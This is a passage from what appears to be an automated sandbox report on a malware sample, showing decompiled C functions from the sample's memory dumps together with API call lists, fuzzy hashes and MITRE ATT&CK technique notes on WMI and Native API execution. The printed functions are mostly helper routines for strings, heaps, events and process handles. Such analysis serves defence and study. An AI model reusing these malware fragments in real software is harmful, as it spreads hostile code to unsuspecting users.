						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02c87ec6
0x02c87ec9
0x02c87ecf
0x02c87ee7
0x02c87ee9
0x02c87eee
0x02c87ef0
0x02c87ef3
0x02c87ef5
0x02c87ef8
0x02c87efa
0x02c87efa
0x02c87efc
0x02c87f07
0x02c87f0c
0x02c87f1d
0x02c87f25
0x02c87f2a
0x02c87f2d
0x02c87f30
0x02c87f32
0x02c87f35
0x02c87f38
0x02c87f38
0x02c87f3b
0x02c87f46
0x02c87f4b
0x02c87f55

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02C888D3,00000000,?,?,02C82AF0,?,050E95B0), ref: 02C87EC9
RtlAllocateHeap.NTDLL(00000000,?), ref: 02C87EE1
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02C888D3,00000000,?,?,02C82AF0,?,050E95B0), ref: 02C87F25
memcpy.NTDLL(00000001,?,00000001), ref: 02C87F46

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: e4278aed00582cc47a4c905f5559d234291a12b080c8bf566cb4425ca0b0452e
Instruction ID: 45a2c8122c8c6aac744abf8b4ade6198ae37cb1df3c5ac40612885da2d5ae73c
Opcode Fuzzy Hash: e4278aed00582cc47a4c905f5559d234291a12b080c8bf566cb4425ca0b0452e
Instruction Fuzzy Hash: 0B115972A00144BFC3108E69CC88E9EBBFEEBD1360B148276F504CB190E7708E14C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02C864A0, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02C864A0(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E02C8427C(_t8, _t1);
				_t16 = E02C87E20(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E02C84588(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E02C87E20(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E02C8A5FA(_t16);
				}
				return _t18;
			}

0x02c864ab
0x02c864ac
0x02c864af
0x02c864b1
0x02c864bc
0x02c864c0
0x02c864c5
0x02c864c9
0x02c864d1
0x02c864d6
0x02c864de
0x02c864de
0x02c864e7
0x02c864eb
0x02c864f1
0x02c864f4
0x02c864fa
0x02c864fa
0x02c86502
0x02c86502
0x02c86509
0x02c86509
0x02c86514

APIs

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

Part of subcall function 02C84588: wsprintfA.USER32 ref: 02C845E4

lstrlen.KERNEL32(02C85D90,00000000,00000000,00000027,00000005,00000000,00000000,02C841C3,74666F53,00000000,02C85D90,02C8D00C,?,02C85D90), ref: 02C864D6
lstrcpy.KERNEL32(00000000,00000000), ref: 02C864FA
lstrcat.KERNEL32(00000000,00000000), ref: 02C86502

Strings

Soft, xrefs: 02C864AC, 02C864C5

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: efe109f3faffe0606c0a3fd662f102985d89759812305ed3d08456d8b5f1e85f
Instruction ID: b8ea4a4ff996c7219bef0ded76e75bc3770ad7d3607f9f913cbcfcd86404644d
Opcode Fuzzy Hash: efe109f3faffe0606c0a3fd662f102985d89759812305ed3d08456d8b5f1e85f
Instruction Fuzzy Hash: A301A73210011667CB113AA4DC84AAF7AAEEFC525DF24C115F6055A144DB35C65597E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D481CDD() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6d484130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d48413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6d48412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6d484128 = _t5;
						 *0x6d484130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6d484124 = _t6;
						if(_t6 == 0) {
							 *0x6d484124 =  *0x6d484124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D481243,73B763F0), ref: 6D481CEC
GetVersion.KERNEL32 ref: 6D481CFB
GetCurrentProcessId.KERNEL32 ref: 6D481D17
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D481D30

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 117733e475db13fee8be219c2d5c7092c6d761a40458427325c2cdd2ee49a0e0
Instruction ID: 9178afa898cb8050c4f64e12127543f316ac08763d2ddb2a3079fa9967190dc5
Opcode Fuzzy Hash: 117733e475db13fee8be219c2d5c7092c6d761a40458427325c2cdd2ee49a0e0
Instruction Fuzzy Hash: AAF031319443519BDF10BF68A85DB953BFAA70B7D3F20011EE555DA2C8E760DC418B58

Uniqueness

Uniqueness Score: -1.00%

Function 02C88AED, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C88AED(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02c88af7
0x02c88afb
0x02c88b10
0x02c88b12
0x02c88b17
0x02c88b1d
0x02c88b1f
0x02c88b24
0x02c88b2f
0x02c88b26
0x02c88b26
0x02c88b26
0x02c88b24
0x02c88b3d

APIs

memset.NTDLL ref: 02C88AFB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,73BB81D0), ref: 02C88B10
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02C88B1D
CloseHandle.KERNEL32(?), ref: 02C88B2F

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: c04c342cfcd1a92b4b9841a7c3853dc07e2eb46dfad51842562ff997b64bd249
Instruction ID: 8a3c50b090d37aeeda343f93b6add3449e958f5666f04b5f73ebe59e4227ddb1
Opcode Fuzzy Hash: c04c342cfcd1a92b4b9841a7c3853dc07e2eb46dfad51842562ff997b64bd249
Instruction Fuzzy Hash: FCF03AF150430C6FD2106F669C84C27BBACEB9119CB118A2EF14282901D675A9188A60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C1585, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D4C159F

Part of subcall function 6D4C0234: __FF_MSGBANNER.LIBCMT ref: 6D4C0257
Part of subcall function 6D4C0234: __NMSG_WRITE.LIBCMT ref: 6D4C025E

std::bad_alloc::bad_alloc.LIBCMT ref: 6D4C15C2

Part of subcall function 6D4C151B: std::exception::exception.LIBCMT ref: 6D4C1527

std::bad_exception::bad_exception.LIBCMT ref: 6D4C15D6
__CxxThrowException@8.LIBCMT ref: 6D4C15E4

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: 15ad59294c2aaa98c2661b251fe2d09df1dc8916957ca5a0aeaa9f183e296139
Instruction ID: 489270ce6b65dd6dd2012b2d865fc6c452bf6188fda722c51cf59c355964933a
Opcode Fuzzy Hash: 15ad59294c2aaa98c2661b251fe2d09df1dc8916957ca5a0aeaa9f183e296139
Instruction Fuzzy Hash: C1F0202D80820666DF08FB20DC01E7D3B788B0135CF2200ADEA1E56291EF30AE42CAC3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3FEC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D4C3FF8

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__getptd.LIBCMT ref: 6D4C400F
__amsg_exit.LIBCMT ref: 6D4C401D
__lock.LIBCMT ref: 6D4C402D

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: c72e7ab8889b95298e52dae78af93ab7125839db084c83f24f7eee1bc7902ffb
Instruction ID: 3ace2e383f8cf0a3afb5e521f8524ccc15b7779d48ba6974702d38e19e1d7c29
Opcode Fuzzy Hash: c72e7ab8889b95298e52dae78af93ab7125839db084c83f24f7eee1bc7902ffb
Instruction Fuzzy Hash: 90F06D3AA887019ADB20EBB5C248F5A76B0AF44359F12411DD6186B6E0CB70AD01CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 02C8469F, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C8469F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2c8d26c; // 0x2d8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2c8d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2c8d26c; // 0x2d8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2c8d238; // 0x4cf0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02c8469f
0x02c846a6
0x02c846f0
0x02c846f2
0x02c846f2
0x02c846aa
0x02c846b0
0x02c846b5
0x02c846b9
0x02c846bf
0x02c846c6
0x00000000
0x00000000
0x02c846c8
0x02c846cd
0x00000000
0x00000000
0x00000000
0x02c846cd
0x02c846cf
0x02c846d7
0x02c846da
0x02c846da
0x02c846e0
0x02c846e7
0x02c846ea
0x02c846ea
0x00000000

APIs

SetEvent.KERNEL32(000002D8,00000001,02C8649A), ref: 02C846AA
SleepEx.KERNEL32(00000064,00000001), ref: 02C846B9
CloseHandle.KERNEL32(000002D8), ref: 02C846DA
HeapDestroy.KERNEL32(04CF0000), ref: 02C846EA

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: abd65a4bce047ded58526a0f8c0e715ce1fbff3a8c68dee26c647f29c7683790
Instruction ID: 8ea154987627064e619a6318e365152ca9cf9cd823072fcf5606aa7150904e6d
Opcode Fuzzy Hash: abd65a4bce047ded58526a0f8c0e715ce1fbff3a8c68dee26c647f29c7683790
Instruction Fuzzy Hash: 67F03071E8131397DB287F35AD48F463B98AB446A9705CB11F806D72C0DF60DE509BB4

Uniqueness

Uniqueness Score: -1.00%

Function 02C8804C, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02C8804C(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2c8d32c; // 0x50e95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2c8d32c; // 0x50e95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2c8d030) {
					HeapFree( *0x2c8d238, 0, _t8);
				}
				_t14[1] = E02C86BC0(_v0, _t14);
				_t11 =  *0x2c8d32c; // 0x50e95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x02c8804c
0x02c8804c
0x02c88055
0x02c88065
0x02c88065
0x02c8806a
0x02c8806f
0x00000000
0x00000000
0x02c8805f
0x02c8805f
0x02c88071
0x02c88075
0x02c88087
0x02c88087
0x02c88097
0x02c8809a
0x02c8809f
0x02c880a3
0x02c880a9

APIs

RtlEnterCriticalSection.NTDLL(050E9570), ref: 02C88055
Sleep.KERNEL32(0000000A,?,02C85D85), ref: 02C8805F
HeapFree.KERNEL32(00000000,00000000,?,02C85D85), ref: 02C88087
RtlLeaveCriticalSection.NTDLL(050E9570), ref: 02C880A3

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 30b4f25f79c9f40f9d41411dfcf58b55708247d57e6c2f692e5c36c523848311
Instruction ID: dbbd009bf5e300f02e2f35903018579d91bdb3f9ad59401797d4c256c95cfc9d
Opcode Fuzzy Hash: 30b4f25f79c9f40f9d41411dfcf58b55708247d57e6c2f692e5c36c523848311
Instruction Fuzzy Hash: 30F05E70A402049BD728AF78DC88F1677E4AF04789B44CB05F907CB691C720DA60DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C85DDD, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02C85DDD() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2c8d32c; // 0x50e95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2c8d32c; // 0x50e95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2c8d32c; // 0x50e95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2c8e836) {
					HeapFree( *0x2c8d238, 0, _t10);
					_t7 =  *0x2c8d32c; // 0x50e95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02c85ddd
0x02c85de6
0x02c85df6
0x02c85df6
0x02c85dfb
0x02c85e00
0x00000000
0x00000000
0x02c85df0
0x02c85df0
0x02c85e02
0x02c85e07
0x02c85e0b
0x02c85e1e
0x02c85e24
0x02c85e24
0x02c85e2d
0x02c85e2f
0x02c85e33
0x02c85e39

APIs

RtlEnterCriticalSection.NTDLL(050E9570), ref: 02C85DE6
Sleep.KERNEL32(0000000A,?,02C85D85), ref: 02C85DF0
HeapFree.KERNEL32(00000000,?,?,02C85D85), ref: 02C85E1E
RtlLeaveCriticalSection.NTDLL(050E9570), ref: 02C85E33

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 421b6af5a7d15f160439651bf28fc94c663e3c5a55129d960e808ee65e9c6902
Instruction ID: a45790b552f980b7485074b53de60d22c0dd4ed428dcc62e2cb599ef52121bcc
Opcode Fuzzy Hash: 421b6af5a7d15f160439651bf28fc94c663e3c5a55129d960e808ee65e9c6902
Instruction Fuzzy Hash: 48F0DA74E801409BE718AF74DD99B1677F5EB48385B45CA0EF907CB390C774A960DB21

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C4CF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D4C4D00

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__getptd.LIBCMT ref: 6D4C4D0E

Strings

csm, xrefs: 6D4C4D1C

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction ID: 89e6f72b152a0c2a6948cf2831e62a0e0b81a03eec9ce7ed163a707ed80e5603
Opcode Fuzzy Hash: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction Fuzzy Hash: 10014F38804346CACB34DF60C544FACB7B5AF49255F64491DE05956760EB30EE80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C88389, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02C88389(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02C87E20(_t2);
				if(_t34 != 0) {
					_t30 = E02C87E20(_t28);
					if(_t30 == 0) {
						E02C8A5FA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02C8A8C7(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02C8A8C7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02c88389
0x02c88393
0x02c88395
0x02c8839b
0x02c8839b
0x02c883a4
0x02c883a8
0x02c883b4
0x02c883b8
0x02c8842c
0x02c883ba
0x02c883ba
0x02c883be
0x02c883c3
0x02c883c8
0x02c883e2
0x02c883d1
0x02c883d1
0x02c883d5
0x02c883d8
0x02c883dd
0x02c883dd
0x02c883e7
0x02c8840f
0x02c88415
0x02c88418
0x02c883e9
0x02c883eb
0x02c883f3
0x02c883fe
0x02c88403
0x02c88403
0x02c8841f
0x02c88426
0x02c88427
0x02c88427
0x02c883b8
0x02c88437

APIs

lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,02C85741,?,?,?,?,00000102,02C86187,?,?,00000000), ref: 02C88395

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

Part of subcall function 02C8A8C7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02C883C3,00000000,00000001,00000001,?,?,02C85741,?,?,?,?,00000102), ref: 02C8A8D5
Part of subcall function 02C8A8C7: StrChrA.SHLWAPI(?,0000003F,?,?,02C85741,?,?,?,?,00000102,02C86187,?,?,00000000,00000000), ref: 02C8A8DF

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02C85741,?,?,?,?,00000102,02C86187,?), ref: 02C883F3
lstrcpy.KERNEL32(00000000,00000000), ref: 02C88403
lstrcpy.KERNEL32(00000000,00000000), ref: 02C8840F

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 15ec57397bf5ccc1408ac8c425d63ab963c2a5a3e459a8e171c760b15afc3379
Instruction ID: b78fb6a602931b644dd8faf39817e71b113919e3c2f725373608427d874628fc
Opcode Fuzzy Hash: 15ec57397bf5ccc1408ac8c425d63ab963c2a5a3e459a8e171c760b15afc3379
Instruction Fuzzy Hash: C221CD72500259ABCB02BF78DC84AAE7FA9AF96288B54C155F9059B201DB31CA01DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02C88FE0, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C88FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02C87E20(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02c88ff5
0x02c88ff9
0x02c89003
0x02c89008
0x02c8900d
0x02c8900f
0x02c89017
0x02c8901c
0x02c8902a
0x02c8902f
0x02c89039

APIs

lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,050E937C,?,02C8581A,004F0053,050E937C,?,?,?,?,?,?,02C88522), ref: 02C88FF0
lstrlenW.KERNEL32(02C8581A,?,02C8581A,004F0053,050E937C,?,?,?,?,?,?,02C88522), ref: 02C88FF7

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,02C8581A,004F0053,050E937C,?,?,?,?,?,?,02C88522), ref: 02C89017
memcpy.NTDLL(73B769A0,02C8581A,00000002,00000000,004F0053,73B769A0,?,?,02C8581A,004F0053,050E937C), ref: 02C8902A

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: e3833c5fffdeb88972562a77afdc1ccc83f0647369365fdd56265243eee87d49
Instruction ID: 6bcb256b6fd89da78990c9d4c23d976066f63202a548e5d972c1e91181763436
Opcode Fuzzy Hash: e3833c5fffdeb88972562a77afdc1ccc83f0647369365fdd56265243eee87d49
Instruction Fuzzy Hash: 1BF04F36900118BF8F11EFA8CC84C9F7BADEF092987118462FD04D7201E735EA149BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02C88007, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(050E9918,00000000,00000000,745EC740,02C82B1B,00000000), ref: 02C88017
lstrlen.KERNEL32(?), ref: 02C8801F

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

lstrcpy.KERNEL32(00000000,050E9918), ref: 02C88033
lstrcat.KERNEL32(00000000,?), ref: 02C8803E

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 307384cededdeb7d7974e21d66c3cde1cefb57518ba2514a4c54d925f6e6faae
Instruction ID: 15f3567014792cc0c5f3071292602ba42c0cc19183f4a9dc66c2fab3a4272d9e
Opcode Fuzzy Hash: 307384cededdeb7d7974e21d66c3cde1cefb57518ba2514a4c54d925f6e6faae
Instruction Fuzzy Hash: C9E092339416246B87116BE4AC48D6BBBADFF896957048A1BF600D7100C72589218BF1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
